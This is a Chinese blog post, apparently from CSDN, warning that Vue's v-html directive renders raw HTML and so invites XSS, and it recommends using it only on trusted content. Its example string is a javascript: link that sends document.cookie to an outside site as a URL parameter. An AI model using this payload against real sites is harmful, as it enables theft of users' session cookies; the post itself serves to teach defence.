Vue中v-html使用的安全性问题

最新推荐文章于 2024-04-14 01:01:48 发布
最新推荐文章于 2024-04-14 01:01:48 发布
阅读量3.6k 收藏 1
点赞数 2
文章标签: css html css3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62858590/article/details/123879916
版权

Vue中的v-html的安全性问题

image-20220330201205724

因为v-html可以完全得去渲染标签节点,所以当我将标签写为

<div id="app">
	<p v-html="str"></p>
</div>
<script>
	var vm = new Vue({
        el: '#app',
        data: {
            str: '<a href=javascript:location.href="http://www.baidu.com?"+document.cookie>资源</a>'
        }
    });
</script>

这样时,再点击a标签后,不仅会将网站跳转到百度,同时也会将所在网站的cookie以参数的形式传入要跳转的网站中去

如果要跳转的网站是一个比较安全的网站还好,但是如果跳转到一个比较危险的服务器,那么,他们就会拿的关于你当前网站的Cookie,这样就免不了出现一些安全性的问题

其次,我们考虑到Cookie的安全性问题了,相信Cookie的开发者也考虑到了,如下图:
![image-20220330201909477](https://gitee.com/xiaomogui666/img/raw/master/202203302019859.png

image-20220331182337008

当上图右边的HttpOnly为 √ 时,就表示只有在发送Http请求时,Cookie才能够被读取,其他时候是不行的,所以并不是任何时候,我们都可以通过JavaScript去读取Cookie

但是,若网站的编写者没有将一些重要的用户信息设置为HttpOnly,这就会导致信息的泄漏

故总结以下两点:

​ 1.在网站上动态渲染任意HTML是是很危险的,容易导致XSS攻击

​ 2.只能在可信的内容上使用v-html,永远不用在用户提交的内容上,容易遭受攻击

命中不缺狗——
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Vue解决V-HTML指令潜在的XSS攻击
caiqian97的博客
03-23 1396
当其他用户进入该网站后,脚本就在用户不知情的情况下偷偷地执行了,这样的脚本可能会窃取用户的信息、修改页面内容、或者伪造用户执行其他操作等等,后果不可估量。发送到Web浏览器的恶意内容通常采用JavaScript代码片段的形式,但也可能包括HTML,Flash或浏览器可能执行的任何其他类型的代码。XSS是一种注入脚本式攻击,攻击者利用如提交表单、发布评论等方式将事先准备好的恶意脚本注入到那些良性可信的网站。三、在vue.config.js或vue-loader.config.js覆写html指令。
VUE解决 v-html不能触发点击事件的问题
12-30
背景:后端返前端html格式的数据,前端用v-html解析渲染,如:<a></a>,a标签能成功渲染,但其绑定的事件无法触发。 原因:vue没有将其作为vue的模板解析渲染 解决方案:不用v-html而是component模板编译 上干货: ...
解决v-html可能存在XSS漏洞风险
CYL_2021的博客
12-28 910
解决v-html可能存在XSS漏洞风险
vue代码安全,10项防范措施_vue的安全,2024年最新【一篇文章搞懂
最新发布
2301_77116622的博客
04-14 1128
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;对于敏感数据,如密码、信用卡信息等,进行加密存储和传输,确保数据的保密性。
vue2 v-html 安全,(四)Vue2.X指令——v-text、v-html
weixin_28811227的博客
06-16 255
v-text:用来输出文本,和{{message}}作用类似v-html:用来解析并正确显示带有html标签的文本注意:{{message}}这种写法的弊端:在javascript出错或者网速较慢时,会直接在屏幕显示出{{message}},造成不是很好的用户体验,所以我们用v-text来做优化,在项目实际开发,采用的也是v-text写法居多。example下新建v-text.html文件v-...
v-html可能导致的问题
WindrunnerMax
06-28 4063
v-html可能导致的问题 Vuev-html指令用以更新元素的innerHTML,其内容按普通HTML插入,不会作为Vue模板进行编译,如果试图使用v-html组合模板,可以重新考虑是否通过使用组件来替代。 描述 易导致XSS攻击 v-html指令最终调用的是innerHTML方法将指令的value插入到对应的元素里,这就是容易造成xss攻击漏洞的原因了。Vue在官网对于此也给出了温馨提示,在网站上动态渲染任意HTML是非常危险的,因为容易导致XSS攻击,只在可信内容上使用v-html,永不用在用户提
Vue2v-html引发的安全问题
知远同学的博客
12-06 1116
1.作用:向指定节点渲染包含html结构的内容。2.与插值语法的区别:(1).v-html会替换掉节点所有的内容,{{xx}}则不会。(2).v-html可以识别html结构。3.严重注意:v-html安全性问题!!!!(1).在网站上动态渲染任意HTML是非常危险的,容易导致XSS攻击。(2).一定要在可信的内容上使用v-html,永不要用在用户提交的内容上!
vue2 v-html 安全,Vue学习笔记二:v-cloak,v-text,v-html使用
weixin_42601702的博客
06-16 393
[TOC]越来越感觉,Vue学起来很有意思v-cloak:解决插值表达式闪烁问题先来写一个HTML,如下Vae{{ msg }}// 这个vm就是MVVM的VM,ViewModelvar vm=new Vue({el: '#app',// 这个data就是MVVM的M,Modeldata: {msg: '许嵩'}})可以看到,我把Vue.js的引用放到div下面了,这样是为了更好的重现插值表...
vue的v-for使用索引index值
01-06
vue的v-for使用索引index值
vue实现在v-html的html字符串绑定事件
10-16
今天小编就为大家分享一篇vue实现在v-html的html字符串绑定事件,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
详解三种方式解决vuev-html元素标签样式
12-29
Vuev-html标签添加CSS样式 <h2 class=title>{{news.title}} <p class=news-time>{{news.datetime}} <div class=con v-html=news.dec> <button class=back @click=goBack()>返回列表</...
vuev-text / v-html使用实例代码详解
10-17
主要介绍了vuev-text / v-html使用实例代码详解,非常不错,代码简单易懂,具有一定的参考借鉴价值,需要的朋友可以参考下
vue使用v-html防止xss注入
aGreetSmile的博客
06-25 1897
通常我们处理xss攻击会使用一个xss的npm包来过滤xss攻击代码。所以我们要做的就是给指令的value包上一层xss函数。这样我们就能覆盖html指令。这样我们就从源头解决了html指令存在的潜在xss攻击。3.在vue.config.js覆写html指令。2.引入xss包并挂载到vue原型上。解决html指令存在的xss漏洞问题
vue使用v-html如何避免xss攻击??
yang_song97的博客
05-17 1124
有时候后端返回的数据是这样的这时我们想到使用vue指令v-html实现,但是这样会有问题,如何防止跨站点脚本(XSS)攻击?这里我们借助插件vue-dompurify-html来实现,直接上代码。
关于v-html容易造成的xss攻击问题解决
u014226080的博客
09-03 1769
今天再用到wangeditor这个工具的时候,存储评论和文章数据,我是直接将文本编辑器的内容以html格式直接存储到数据库,这里在前端用v-html渲染的时候就可能会造成攻击者直接将带有恶意代码的评论,直接发送到数据库,这就需要在渲染前做一个过滤。因为我是在nuxt3使用的,可以在plugins添加上以下文件VueDompurifyHtml.js(vue直接在main.js添加上对应文件的use即可)这里就可以使用以下工具,HTML代码在解释之前用DOMPurify进行清理。
前端vue-dompurify-html替代v-html,避免出现xss攻击
weixin_64310738的博客
02-16 2675
前端vue-dompurify-html替代v-html,避免出现xss攻击
vue2项目 有关安全问题
m0_59930878的博客
07-20 390
好久没写博客了,最近客户提出我们项目出现的一系列安全问题,我觉得值得我去抽时间去把客户提出的安全问题以及解决方案整理一下以便记忆。
Vue 使用v-html后内容未能解析成html解决方法
zediwang的博客
09-06 3194
vue如果想将HTML的内容绑定到元素里面,可以使用 v-html的属性来进行设置。设置好以后发现页面上还是显示的是HTML源代码,未能解析成HTML显示。将接口返回的字符替换成对应的HTML标签,然后再使用v-html进行绑定,页面就显示正常了。导致问题的原因是接口返回的数据未对html的内容做转义,导致页面输出了HTML的代码。理论上我们页面上想显示的是HTML解析后的内容,而实际上页面是将HTML代码输出了。
-32 v-html 指令
sanda_nd的博客
10-05 253
(2) 一定要在可信的内容上使用 v-html,永远不要用在用户提交的内容上。(1) 在网站上动态渲染任意 html 是非常危险的,容易导致。向指定节点渲染包含 html 结构的内容。会替换掉节点的所有内容,可以识别 html 结构。v-html安全性问题
VUEv-html安全问题
06-08
因此,使用v-html指令时需要注意安全性问题,避免出现XSS攻击。 为了保证安全性,应该始终对v-html指令所绑定的数据进行过滤和验证。可以使用第三方库如DOMPurify来过滤HTML字符串,以避免恶意脚本或其他不安全的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

命中不缺狗——

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值